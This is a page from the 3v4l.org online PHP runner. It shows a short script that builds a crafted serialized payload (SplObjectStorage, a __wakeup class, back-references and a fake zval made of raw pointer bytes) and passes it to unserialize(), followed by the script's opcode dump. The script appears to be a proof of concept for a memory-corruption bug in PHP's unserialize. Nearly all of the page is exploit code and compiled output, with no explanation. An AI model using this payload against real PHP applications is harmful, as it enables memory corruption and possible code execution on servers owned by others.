3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj { var $ryat; function __wakeup() { $this->ryat = 1; } } $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; $inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}'; $exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}'; $data = unserialize($exploit); var_dump($data); function ptr2str($ptr) { $out = ''; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; }
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/KjQo3
function name:  (null)
number of ops:  32
compiled vars:  !0 = $fakezval, !1 = $inner, !2 = $exploit, !3 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    9     0  E >   INIT_FCALL_BY_NAME                                       'ptr2str'
          1        SEND_VAL_EX                                              1122334455
          2        DO_FCALL                                      0  $4      
          3        ASSIGN                                                   !0, $4
   10     4        INIT_FCALL_BY_NAME                                       'ptr2str'
          5        SEND_VAL_EX                                              0
          6        DO_FCALL                                      0  $6      
          7        ASSIGN_OP                                     8          !0, $6
   11     8        ASSIGN_OP                                     8          !0, '%00%00%00%00'
   12     9        ASSIGN_OP                                     8          !0, '%01'
   13    10        ASSIGN_OP                                     8          !0, '%00'
   14    11        ASSIGN_OP                                     8          !0, '%00%00'
   16    12        ASSIGN                                                   !1, 'x%3Ai%3A1%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%2Ci%3A1%3B%3Bm%3Aa%3A0%3A%7B%7D'
   17    13        STRLEN                                           ~13     !1
         14        CONCAT                                           ~14     'a%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3BC%3A16%3A%22SplObjectStorage%22%3A', ~13
         15        CONCAT                                           ~15     ~14, '%3A%7B'
         16        CONCAT                                           ~16     ~15, !1
         17        CONCAT                                           ~17     ~16, '%7Di%3A2%3BO%3A3%3A%22obj%22%3A1%3A%7Bs%3A4%3A%22ryat%22%3BR%3A3%3B%7Di%3A3%3BR%3A6%3Bi%3A4%3Bs%3A'
         18        STRLEN                                           ~18     !0
         19        CONCAT                                           ~19     ~17, ~18
         20        CONCAT                                           ~20     ~19, '%3A%22'
         21        CONCAT                                           ~21     ~20, !0
         22        CONCAT                                           ~22     ~21, '%22%3B%7D'
         23        ASSIGN                                                   !2, ~22
   19    24        INIT_FCALL                                               'unserialize'
         25        SEND_VAR                                                 !2
         26        DO_ICALL                                         $24     
         27        ASSIGN                                                   !3, $24
   21    28        INIT_FCALL                                               'var_dump'
         29        SEND_VAR                                                 !3
         30        DO_ICALL                                                 
   31    31      > RETURN                                                   1

Function ptr2str:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 11
Branch analysis from position: 11
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 4
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
Branch analysis from position: 4
filename:       /in/KjQo3
function name:  ptr2str
number of ops:  15
compiled vars:  !0 = $ptr, !1 = $out, !2 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   23     0  E >   RECV                                             !0      
   25     1        ASSIGN                                                   !1, ''
   26     2        ASSIGN                                                   !2, 0
          3      > JMP                                                      ->11
   27     4    >   INIT_FCALL                                               'chr'
          5        BW_AND                                           ~5      !0, 255
          6        SEND_VAL                                                 ~5
          7        DO_ICALL                                         $6      
          8        ASSIGN_OP                                     8          !1, $6
   28     9        ASSIGN_OP                                     7          !0, 8
   26    10        PRE_INC                                                  !2
         11    >   IS_SMALLER                                               !2, 8
         12      > JMPNZ                                                    ~10, ->4
   30    13    > > RETURN                                                   !1
   31    14*     > RETURN                                                   null

End of function ptr2str

Class obj:
Function __wakeup:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/KjQo3
function name:  __wakeup
number of ops:  3
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    5     0  E >   ASSIGN_OBJ                                               'ryat'
          1        OP_DATA                                                  1
    6     2      > RETURN                                                   null

End of function __wakeup

End of class obj.

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
168.42 ms | 1400 KiB | 19 Q